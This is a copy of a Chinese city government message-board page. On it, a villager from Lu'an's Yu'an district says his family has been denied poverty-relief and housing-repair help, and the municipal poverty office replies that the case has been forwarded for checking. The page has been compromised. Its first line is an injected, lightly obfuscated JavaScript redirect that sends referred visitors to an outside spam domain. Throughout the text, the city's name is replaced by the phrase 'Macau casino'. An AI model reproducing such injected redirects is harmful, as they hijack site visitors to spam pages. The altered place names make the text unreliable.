var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}
是扶贫对象,但未享受到政策
来信人:c**|来信时间:2019-09-23 10:18:10|处理情况:[已办结]| 督办部门:市扶贫开发局|问题类别:问题反映|浏览:394

尊敬的领导! 您好 我是澳门赌场裕安区分路口镇晏公村的一位普普通通的村民 首先说明一下我的家庭情况。目前我是和年将70岁的老父亲陈某相依为命,由于家境贫寒,父亲晚婚,40多岁才结婚有了我。母亲是自打嫁进我家起,身体就一直不好,每天的生活起居全靠父亲一人照顾,依稀记得我6岁那一年,母亲因病去世。 我自幼也是父亲一人独立抚养我长大成人并供养学业。(父亲是既当爸又当妈照顾年幼的我)可以说家里是一贫如洗。直至如今,今年已将70岁的父亲为了家庭的营生,任然在外地务工。(工厂做苦工) 每到年底回老家过年时,父亲都会找村委会资讯办理相关国家利民政策,村里干部也是一直以家里没人在家联系不到本人为由,推三阻四,随意搪塞。(包括家里的厨房因年久失修,屋顶也已倒塌,有关危房改造的事情,村里也是一直以各种理由推三阻四) 试问一下,如果条件允许,谁又想背景离乡的出门打工,更别说是一位年将70岁的老人。唯一欣慰的是现在父亲的身体还算好,目前可以自己照顾自己,可是父亲已经是快到70岁的年纪的老人了,加上我至今也未婚,作为一位普通公司的小职工压力可想而知。在这里诚恳的请领导,关注这方面的事,帮助贫困家庭脱贫攻坚望领导能给予帮助与支持!谢谢

回复时间:2019-09-23 16:19:07回复单位:市扶贫开发局回复

网友您好:

       经您再次电话反映,具体情况已知悉,我局已转裕安区扶贫开发局核查,感谢您对澳门赌场扶贫工作的关心、支持。如有不清楚,请致电:0564-3378316(督查科)。

此信件写信人未评价;写信人可登录后进行评价

版权所有:安徽省澳门赌场人民政府  主办:安徽省澳门赌场人民政府  承办:澳门赌场人民政府办公室
  邮编:237001  E-mail:laxxb@luan.gov.cn  电话:0564-3379979
皖ICP备11015645号-1   皖公网安备 34150102000050号   网站标识码:3415000075  
站点地图